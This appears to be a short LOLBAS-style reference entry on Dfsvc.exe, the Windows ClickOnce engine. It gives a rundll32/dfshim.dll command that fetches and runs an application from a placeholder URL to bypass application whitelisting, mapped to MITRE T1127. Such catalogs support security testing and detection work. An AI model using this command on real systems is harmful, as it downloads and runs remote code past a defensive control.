.. / Dfsvc.exe
Star

ClickOnce engine in Windows used by .NET


Paths:


Resources:
https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe

Acknowledgement:
Casey Smith - @subtee


Detection:



AWL bypass

Executes click-once-application from Url
rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
Usecase:Use binary to bypass Application whitelisting
Privileges required:User
OS:Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Mitre:T1127